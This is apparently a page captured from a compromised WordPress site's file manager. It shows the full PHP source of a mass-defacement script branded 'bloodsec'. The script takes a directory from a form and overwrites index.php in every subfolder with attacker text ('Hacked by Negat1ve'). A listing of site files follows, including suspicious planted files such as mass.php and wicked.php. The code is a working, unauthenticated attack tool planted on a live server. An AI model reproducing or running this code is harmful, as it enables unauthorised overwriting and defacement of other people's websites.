PATH:
home
/
bnathsfovv
/
basileleby.org
8:19 AM 1/22/2026<?php echo "<title>bloodsec</title>"; echo "<link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>"; echo "<body bgcolor='black'><font color='white'><font face='Electrolize'>"; echo "<center><form method='POST'>"; echo "Base Dir : <input type='text' name='base_dir' size='50' value='".getcwd ()."'><br><br>"; echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>"; echo "Your Index : <br><textarea style='width: 685px; height: 330px;' name='index'>Hacked by Negat1ve</textarea><br>"; echo "<input type='submit' value='Start'></form></center>"; if (isset ($_POST['base_dir'])) { if (!file_exists ($_POST['base_dir'])) die ($_POST['base_dir']." Not Found !<br>"); if (!is_dir ($_POST['base_dir'])) die ($_POST['base_dir']." Is Not A Directory !<br>"); @chdir ($_POST['base_dir']) or die ("Cannot Open Directory"); $files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>"); foreach ($files as $file): if ($file != "." && $file != ".." && @filetype ($file) == "dir") { $index = getcwd ()."/".$file."/".$_POST['file_name']; if (file_put_contents ($index, $_POST['index'])) echo "$index    <span style='color: green'>OK</span><br>"; } endforeach; } ?>
[+]
wp-includes
[+]
wp-content
[-] .htaccess.bk
[edit]
[-] wp-cron.php
[edit]
[-] wp-mail.php
[edit]
[-] wp-links-opml.php
[edit]
[-] error_log
[edit]
[-] wp-login.php
[edit]
[+]
wp-admin
[-] wp-blog-header.php
[edit]
[-] license.txt
[edit]
[-] readme.html
[edit]
[-] mac.php
[edit]
[-] wp-config-sample.php
[edit]
[-] wp-config.php
[edit]
[-] mass.php
[edit]
[-] wp-signup.php
[edit]
[-] index.php
[edit]
[-] .htaccess
[edit]
[-] wp-activate.php
[edit]
[-] xmlrpc.php
[edit]
[-] wp-trackback.php
[edit]
[+]
..
[-] wp-settings.php
[edit]
[-] wp-load.php
[edit]
[-] .litespeed_flag
[edit]
[-] wicked.php
[edit]
[-] wp-comments-post.php
[edit]